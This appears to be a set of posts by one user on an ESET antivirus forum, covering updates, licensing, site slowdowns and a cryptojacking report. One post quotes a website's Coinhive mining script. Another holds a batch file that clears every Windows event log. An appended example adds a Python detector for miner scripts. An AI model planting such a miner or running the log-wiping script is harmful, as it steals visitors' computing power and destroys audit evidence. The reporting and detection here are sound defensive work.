Posts posted by Super_Spartan

  1. Yeah same here the .214 update KB4058258 is not being offered to me automatically through Windows Updates but I can install it manually. I think Microsoft has been strange lately with Windows updates as they've been releasing then pulling them again so it might be the fact that Microsoft is still investigating whether that update is 100% safe for everyone with no adverse effects.

     

    To download and install it manually: http://download.windowsupdate.com/d/msdownload/update/software/updt/2018/01/windows10.0-kb4058258-x64_69f87cf7f2ea83509d5e61ba2d525a103a6d64f9.msu

     

    That's the link for the 64-Bit version (non Server edition), for all the links to all versions: https://www.catalog.update.microsoft.com/Search.aspx?q=KB4058258

  2. While having themes would be nice, you shouldn't base your renewal upon it. An Antivirus is there to protect you, not to constantly keep opening it up and looking at it. In fact, I install it and forget it's even there, it is very rare that I open the user interface.

     

    If you are using an AV because it has nice colors and themes, then you have chosen the wrong product.

    Just my 2 cents worth.

  3. 5 hours ago, Marcos said:

    I'd suggest generating the following logs if you can reproduce the issue:

    - enable advanced protocol filtering logging in the advanced setup
    - start logging with Wireshark
    - start logging with Procmon
    - reproduce the issue
    - disable logging and save logs (make sure to include "protoscan_on" in the Wireshark and Procmon log file names)
    - collect logs with ELC
    - disable protocol filtering
    - start logging with Wireshark
    - start logging with Procmon
    - make sure the issue doesn't occur
    - disable logging and save logs (make sure to include "protoscan_off" in the Wireshark and Procmon log file names)
    - re-enable protocol filtering
    - upload the Wireshark, Procmon and ELC logs to a safe location and drop me a personal message with download links.

    Also try running Chrome without extensions by using the --disable-extensions parameter when launching it to see if it makes a difference.

    Thanks for the detailed suggestion Marcos.

     

    What I just remembered is that I recently installed the Killer Performance Suite which is supposed to control bandwidth per app to prioritize certain apps. I just uninstalled that and will report back if I face the issue again, then I'll do those things you mentioned to troubleshoot.

    I have Adblock Plus with the following filters as well so I might disable that if I run into the issue as well before running those steps. These are my filters:

     

    [Image: filters.png]

  4. I've been recently noticing a bit of a lag when accessing websites, I know the HTTP Scanner has to do its thing but like Gmail isn't even loading, it would hang on loading page for ages. I thought it's just a Gmail glitch at first. Today I tried accessing Gmail, and it just got stuck at loading Gmail....

    I then disabled NOD32 and the page loaded instantly.

     

    What gives?

  5. I just installed it manually and everything looks fine:

     

    Windows 10 Cumulative Update to Build 16299.192

     

    First download the Cumulative update then install it:

     
     
     
    After the reboot, download and install the Servicing Stack and install it:
     
  6. 20 hours ago, 0xDEADBEEF said:

    I think ESET's lightweight is from dynamic binary translation and extensive caching and whitelisting.

    Generally in-product sandbox (and heuristics) can hardly be lightweight as there are pre-exec unpacking analysis. However, with some engineering effort, one can optimize for common cases. Most users will not generate tons of new binary/archive in a short period of time, therefore by skipping known good files, the performance impact can be reduced significantly. I noticed ESET recently has further optimization on this by caching the DBT-ed data of binary to further accelerate the scanning. https://support.eset.com/ca6626/

    However, if you hit the "corner case", like doing huge compilation job, ESET is no longer the lightest weight product (perhaps this is the case in AV-TEST). The lightest weight solution is -- not to scan anything, so no extra instructions to execute :rolleyes:

    thanks a lot. that's the kinda answer I was looking for

  7. Despite some ups and downs and previous versions like v7 and v8, overall, ESET has been known ever since I started using it since v2 to be one of the most secure and lightest Antivirus at the same time

     

    My question is, what is this magic? how does it achieve this great security level, no false positives AND be the lightest?

  8. I have this batch file to clear the event log. When I ran it on my friend's PC which has NOD32 as well, NOD32 blocked it.

     

    Just wanna make sure the batch file is safe?

     

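    @echo off
    REM Elevation probe: without admin rights the last line of bcdedit output starts with "Access" (is denied)
    FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
    IF (%adminTest%)==(Access) goto noAdmin
    REM Enumerate every event log channel and clear each one
    for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
    echo.
    REM Stop here so execution does not fall through into :do_clear with no argument
    goto :eof
    :do_clear
    echo clearing %1
    wevtutil.exe cl %1
    goto :eof
    :noAdmin
    exit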

     

  9. On 12/2/2017 at 10:48 AM, BobU said:

    New update to Windows 10 Creator Update 1709 and now at start NOD32 shows an exclamation and says it needs to be added to Windows Security or something very similar. Take a minute or so.

    Expected behavior? Something need to change?

    ~Bob

    I have the same exact problem and this is on a clean install with Windows 10 Fall Creators update + the latest NOD32 Antivirus v11.0.149.0

  10. are you gonna post every new pre-release / Beta update you get? The majority of users me included only care about stable releases. Beta updates are way too many to be making a new thread every time you get an update. (no pun intended)

  11. 1 hour ago, John Alex said:

    I agree with you, shouldn't be "another A/V comparison",  but now seems to be a monthly event for ESET, when it scores the worst among "big names"

    It seems like ESET got lost in sophistication (UEFI scanner!!!!) but ignores the basics.

     

     

    All I can tell you is that in the 14 years that I've been using ESET NOD32 Antivirus (not even the Internet Security with its firewall), I have never gotten a virus and I do visit all kinds of sites you can imagine. ESET's HTTP scanner automatically blocks any bad sites/connections. nuff said. Take these tests with a grain of salt. I for one, will never trust Microsoft with my computer's security and their heavy Windows Defender. http://chart.av-comparatives.org/chart1.php?chart=chart4&year=2017&month=10&sort=1&zoom=2

  12. 2 hours ago, foneil said:

    It does depend on where the license was purchased and the type of license, remember we are a partner-based company and different partners and distributors offer different license types. If your friend bought an NFR (not for resale), this will affect renewal obviously. If they bought online, the license type will depend on the location of the partner (it's possible to purchase licenses outside of the US, for example).

    Otherwise, your friend should use License Manager to add their current license to my.eset.com, and from there, can add license quantity:

    http://help.eset.com/license_manager/en-US/elm_managing_license.html 

    He bought it from the same ESET US site I pointed above. It says if he wants to increase the license size, he has to call sales so no way to do it online like you could with the Middle East site. I'll tell him to call then

  13. On the ESET Middle East site, I can renew OR increase the license size. Now I've recommended NOD32 to a friend who's in the USA and he bought a 2 user license for 2 years. He just bought his daughter a computer so he wants to add another seat rather than get her a separate license. We couldn't find a way to increase the license size on the ESET US website. There was only renew license and when he enters his license there, it says his license is not eligible for renewal. Probably because his license is still valid for another year.

     

    so how does one add to the PC count of his license? why isn't it as easy as it is on the ESET Middle East Site?

  14. 5 hours ago, itman said:

    Yes.

    The NoCoin rule in the full AdBlock Plus solution in addition to the NoCoin extension in Firefox and possibly a similar Chrome plug-in use the GitHub list described here: https://github.com/hoshsadiq/adblock-nocoin-list . So in your case, this would have blocked the coinhive.com connection prior to Eset's URL block list intercepting it. Unfortunately, the Adblock Plus add-on for IE does not have such capability and you are forced to use another URL block list method.

    However, I thought you commented on your CPU spiking when entering the web site? Did this occur prior to adding the Adblock Plus NoCoin rule?

    That was on another system with nothing installed

     

    So when I checked that link on my system, NOD32 didn't alert me of anything. Now it makes sense that you mention it though, seems that no coin filter is worth it after all

  15. 7 hours ago, cyberhash said:

    I don't think it's the matter of failing. They could easily be blocked, but it's a fact that these miners also have a legitimate purpose and that's where the grey area comes into play. But as noted above you DO have the option of enabling detection of PUA.

    Alternatively ............

    Not installing & running Java , using something along the lines of noscript (hard for novices) , plus using a browser that "Asks" when flash content is wanting to be run and not allowed by default.

    There are also plugins like "No coin" appearing , that specifically targets these miners

     

    I have enabled the no coin rule in Adblock Plus, perhaps that's why ESET wasn't alerting me of anything when visiting that site?

  16. 5 hours ago, itman said:

    I can confirm that Eset is not detecting the Coin Hive miner on the posted TechInferno web site link. Neither is the Fanboy Adblock TPL I use in IE11. I do know this TPL does have an entry for Coin Hive. So it appears that Coin Hive has indeed figured out a way around the block lists and AV PUA detection.

    I didn't initially detect the coin mining activity since you have to enter one of the sub-forums from the main TechInferno forum web page for the coin mining to take place. Also on my PC and possibly due to it has a 6 core CPU, I didn't see CPU activity exceeding 15%. However, I didn't stick around long on that web page.

    -EDIT- Appears the coin mining is going on through the animated banner on the web page. Position your mouse cursor on banner text to stop the scrolling. CPU activity drops to next to nil.

    @Marcos

     

    Can you please comment on this. also, why does ESET Samples never reply to me.

  17. 22 minutes ago, 0xDEADBEEF said:

    If you turn on the detection of "potentially unsafe application", ESET will detect the miner script. Not sure why this is in "potentially unsafe" but not "potentially unwanted"

    I have turned on detect potentially unsafe applications, it doesn't detect it, and this should be detected by the HTTP scanner. Kaspersky is already blocking it.

  18. Since I never get any response from ESET, I just thought I would also post this here for an admin to make sure this site is blocked....here is a copy of the email I just sent to ESET Samples Team:

    Please check this site: https://www.techinferno.com/index.php?/forums/ and have ESET’s HTTP Scanner block it

     

    ===========================================================================================================

    Just like to warn you guys that it would seem that techinferno has now started to use end users' computers to mine crypto currency.


    Just went on myself to check for some info and watched my CPU spike to 100% with the system lagging, even down to GPU driver crashing so I closed the tab it went back to normal, I then went and viewed the source for the index page.

    Here is what was found:


    <link rel='shortcut icon' href='****://sslcdn.techinferno.com/uploads/monthly_2017_08/favicon.ico.902cfabe37f7260915a7c8342595a33e.ico'>

    <script src="****://coinhive.com/lib/coinhive.min.js"></script>
    <script>
    var miner = new CoinHive.Anonymous('uWKXebL5jXICjXGj85wncylJDkRN9gVu');
    miner.start();
    </script>


    TOS

    Tech|Inferno is a technology website dedicated to discovering the latest breakthroughs in vbios, bios, egpu and other trends in the industry. As part of this dedication to cutting edge technology, we sometimes try new technologies as part of our codebase that can range from subtle advertising in the form of text to silent cryptocurrency mining. None of the technology we test on this website will ever adversely affect our end users as we try to keep it minimal and out of sight so that our users can maximize their enjoyment of Tech|Inferno without the typical advertisements cluttering their screens
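
Added example, not part of the original post or of any ESET or Adblock Plus code: a small checker that flags the two markers visible in the page source quoted above, a script loaded from coinhive.com and an inline `new CoinHive.…(` call. The host list, function names and sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed blocklist: coinhive.com is the only host named in the post.
MINER_HOSTS = {"coinhive.com"}
# Inline constructor call of the kind shown in the quoted page source.
MINER_CALL = re.compile(r"\bnew\s+CoinHive\.\w+\s*\(")
# Constructed sample page; the site key is a placeholder.
SAMPLE = """<html><head>
<script src="https://cdn.example.org/jquery.min.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');
</script>
</head><body></body></html>"""

class MinerScriptFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (kind, detail) tuples in document order
        self._inline = None  # list of text chunks while inside <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._inline = []
        src = dict(attrs).get("src")
        host = (urlparse(src).hostname or "").lower() if src else ""
        # Match the listed host or any subdomain, not look-alike suffixes.
        if any(host == h or host.endswith("." + h) for h in MINER_HOSTS):
            self.findings.append(("external", src))

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            match = MINER_CALL.search("".join(self._inline))
            if match:
                self.findings.append(("inline", match.group(0)))
            self._inline = None

def find_miner_scripts(html):
    finder = MinerScriptFinder()
    finder.feed(html)
    finder.close()
    return finder.findings
```

`find_miner_scripts(SAMPLE)` reports the external include and the inline constructor call, and ignores the unrelated jQuery include.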


     

  19. 1 hour ago, GianRoss said:

    Well,

    I was hoping I could get in to it a little more than that, perhaps I didn't explain very well. For example, it blocks many Internet pages that I've used for years, I'm not positive what scans to use when, I'm unable to download. I should have asked for a tutorial to familiarize myself.

    P.S. It just let me get this version yesterday, how do I get 11?

     

     

    TY :)

    GR

    There's nothing additional that needs to be done. If ESET is blocking some sites and/or files, it is for a good reason as they are known from previous history that they have 0 or close to very little false positives so I suggest you stop visiting the pages that you *thought* were safe and leave that to the security experts (no pun intended)

     

    To download ESET NOD32 v11.0.144.0, visit this link: https://download.eset.com/com/eset/apps/home/eav/windows/latest/eav_nt64.exe
